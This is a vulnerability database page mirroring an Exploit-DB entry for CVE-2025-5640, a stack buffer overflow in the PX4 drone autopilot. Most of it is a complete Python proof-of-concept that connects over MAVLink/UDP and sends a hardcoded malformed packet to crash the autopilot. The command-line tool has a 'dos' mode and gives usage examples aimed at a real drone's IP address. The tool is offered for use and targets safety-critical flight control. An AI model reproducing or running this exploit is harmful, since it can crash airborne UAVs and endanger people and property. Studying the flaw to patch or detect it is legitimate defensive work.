Vulners
Lucene search
PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS)
🗓️ 26 Jun 2025 00:00:00Reported by Mohammed Idrees BanyamerType 
exploitdb🔗 www.exploit-db.com👁 403 Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2025-5640 | 5 Jun 202506:48 | – | circl |
 | PX4 Drone Autopilot 安全漏洞 | 5 Jun 202500:00 | – | cnnvd |
 | CVE-2025-5640 | 5 Jun 202506:00 | – | cve |
 | CVE-2025-5640 PX4-Autopilot TRAJECTORY_REPRESENTATION_WAYPOINTS Message mavlink_receiver.cpp stack-based overflow | 5 Jun 202506:00 | – | cvelist |
 | EUVD-2025-16967 | 3 Oct 202520:07 | – | euvd |
 | Exploit for CVE-2025-5640 | 21 Jun 202511:52 | – | githubexploit |
 | CVE-2025-5640 | 5 Jun 202506:15 | – | nvd |
 | 📄 PX4 Military UAV Autopilot 1.12.3 Denial of Service | 26 Jun 202500:00 | – | packetstorm |
| 📄 PX4 Military UAV Autopilot 1.12.3 Denial of Service | 2 Dec 202500:00 | – | packetstorm |
| 📄 Keras 2.15 Insecure Deserialization | 18 Dec 202500:00 | – | packetstorm |
10
# Exploit Title: PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS)
# Author: Mohammed Idrees Banyamer (@banyamer_security)
# GitHub: https://github.com/mbanyamer
# Date: 2025-06-21
# Tested on: Ubuntu 20.04 LTS + PX4 SITL (jMAVSim)
# CVE: CVE-2025-5640
# Type: Denial of Service (DoS) via Buffer Overflow
# Platform: Cross-platform (Military UAVs / PX4 SITL / Linux-based autopilot ground station)
# Author Country: Jordan
# Description:
# A stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot <=1.12.3 is triggered
# when handling a malformed MAVLink message of type TRAJECTORY_REPRESENTATION_WAYPOINTS.
# An attacker with access to the MAVLink communication channel can send a crafted packet
# to crash the autopilot, potentially disrupting military UAV operations. This exploit demonstrates
# a proof-of-concept that causes the PX4 autopilot to crash via UDP.
import argparse
import binascii
from pymavlink import mavutil
import sys
# Exploit payload (malformed MAVLink hex)
hex_payload = (
"fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352"
"c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b78"
"12731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6"
)
def connect_to_px4(ip, port, timeout, verbose=False):
try:
if verbose:
print(f"[*] Connecting to PX4 at udp:{ip}:{port} ...")
master = mavutil.mavlink_connection(f"udp:{ip}:{port}")
master.wait_heartbeat(timeout=timeout)
if verbose:
print("[+] PX4 heartbeat received. Connection OK.")
return master
except Exception as e:
print(f"[!] Error connecting to PX4: {e}")
sys.exit(1)
def send_dos_packet(master, verbose=False):
try:
payload = binascii.unhexlify(hex_payload)
master.write(payload)
print("[+] Exploit packet sent. Monitor PX4 for crash.")
except Exception as e:
print(f"[!] Failed to send payload: {e}")
sys.exit(1)
def main():
usage = """
PX4 Exploit Tool - CVE-2025-5640
=================================
Exploit a buffer overflow vulnerability in PX4 autopilot via MAVLink.
USAGE:
python3 px4_exploit_tool.py [OPTIONS]
EXAMPLES:
# Run DoS attack on default PX4 SITL
python3 px4_exploit_tool.py --mode dos
# Test connectivity to a real drone
python3 px4_exploit_tool.py --mode check --ip 192.168.10.10 --port 14550
OPTIONS:
--ip Target IP address (default: 127.0.0.1)
--port Target UDP port (default: 14540)
--mode Mode of operation: dos (default), check
--timeout Timeout in seconds for heartbeat (default: 5)
--verbose Enable verbose output
"""
parser = argparse.ArgumentParser(
description="PX4 MAVLink DoS Exploit Tool (CVE-2025-5640) by @banyamer_security",
epilog=usage,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("--ip", default="127.0.0.1", help="Target IP address (default: 127.0.0.1)")
parser.add_argument("--port", type=int, default=14540, help="Target UDP port (default: 14540)")
parser.add_argument("--timeout", type=int, default=5, help="Timeout in seconds for heartbeat (default: 5)")
parser.add_argument("--mode", choices=["dos", "check"], default="dos", help="Mode: dos (default) or check connection")
parser.add_argument("--verbose", action="store_true", help="Enable verbose output")
args = parser.parse_args()
master = connect_to_px4(args.ip, args.port, args.timeout, args.verbose)
if args.mode == "check":
print("[*] PX4 is alive. Connection test passed.")
elif args.mode == "dos":
send_dos_packet(master, args.verbose)
if __name__ == "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jun 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 21.7
CVSS 3.13.3
CVSS 44.8
CVSS 33.3
EPSS0.00191
SSVC